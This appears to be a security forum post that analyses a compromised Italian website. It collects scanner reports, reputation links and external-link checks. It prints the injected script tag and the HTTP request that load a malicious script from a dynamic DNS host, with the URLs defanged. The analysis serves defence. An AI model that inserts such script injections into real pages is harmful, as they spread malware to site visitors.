Detected a Dynamic DNS URL

Viruses and worms
1

See IDS alert: http://urlquery.net/report.php?id=7181581

malware from same IP & Listed on PHISHWatch
3 instances 0f malcode alive and low detection rate: http://support.clean-mx.de/clean-mx/viruses.php?ip=195.110.124.133&sort=first%20desc

DrWeb’s detects there as DrWeb as infested with JS.IFrame.514

Web rep: http://www.mywot.com/en/scorecard/whizz.it

Injection check: Suspicious Text after HTML - <script language=‘javascript’ src=hxtp://w5v3fjum97.dyndns.info/infob.php?i=24541>

  • URLs and sub domains distributing the malware or acting as a redirector: sucuri blacklisted!

GET /infob.php?i=24541 HTTP/1.1
Host: w5v3fjum97 dot dyndns dot info **

External links check:
htxp://www.discoveritalia.it → ‘discoveritalia .it’
htxp://www.ideabook.it → ‘ideabook’
htxp://www.bbgglobalch.com → ‘bbg global, ag’
htxp://www.isnart.it/ → ‘isnart’
htxp://www.deagostini.it → ‘istitituto geografico de agost’
htxp://www.federalberghi.it/attivita.asp → ‘www.federalberghi.it’
htxp://www.confcommercio.it/home/confturism/index_ie.html → ‘www.confrutismo.it’
htxp://www.federterme.it/ → ‘www.federterme.it’
htxp://www.confindustria.it/ → ‘www.confindustria.it’
htxp://www.aica-italia.it/ → ’ ’
htxp://www.federalberghiroma.it/ → ‘www.federalberghiroma.it’
htxp://www.regione.lazio.it → ‘www.regione.lazio.it’
htxp://www.isnart.it → ‘www.isnart.it’
htxp://www.faita.it → ‘www.faita.it’

Suspicious external script via Zulu Zscaler: http://jsunpack.jeek.org/?report=f284354134f054793f95b1aa65eaa77e5c922904 (not found)
Suspicious externall script idem : htxp://5z535qer82.dyndns.info/infob.php?i=24541 → http://jsunpack.jeek.org/?report=840d60f8e1840065c1e70fd22f8c201517771d4b **
on this see: vdog.tv/?source=traf5&medium=cpm benign
[nothing detected] (iframe) vdog dot tv/?source=traf5&medium=cpm
status: (referer=5z535qer82.dyndns.info/slb.php?i=24541)saved 5757 bytes 749aba553b4eada16762728abe959438e6cecacf
info: [script] vdog dot tv/js/jquery.min.js
info: [script] vdog dot tv/js/jNotify.jquery.js
info: [img] vdog dot tv/images/screen.jpg
info: [iframe] mediarouting.com/ads ?? poor web rep: http://www.mywot.com/en/scorecard/mediaroute.de?utm_source=addon&utm_content=popup-donuts
info: [decodingLevel=0] found JavaScript
suspicious:
given clean here: http://evuln.com/tools/malware-scanner/whizz.it/
Quttera flags as suspicious:
conversionlab.trackset.com/track/tsends.js
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Procedure: + has been called with a string containing hidden [iframe] tag ‘<iframe src=https://conversionlab.trackset.com/track/cl.gif?md5=32%26ck_abil=0%26ris=x%26lang=%26keyword=%26cr’ to conversionlab.trackset.com
Threat dump: View code here http://www.quttera.com/detailed_report/whizz.it#myModalSusp3938C4368B75D488FB758E653AC864BE
and here: http://jsunpack.jeek.org/?report=509b8002201e4fa8da4eb6b99ba9b845961b1117
File size[byte]: 14326
File type: ASCII
MD5: 3938C4368B75D488FB758E653AC864BE
Scan duration[sec]: 0.205000

polonus

2

Avast detects it now: http://icreamservice.com/report/url-3511

polonus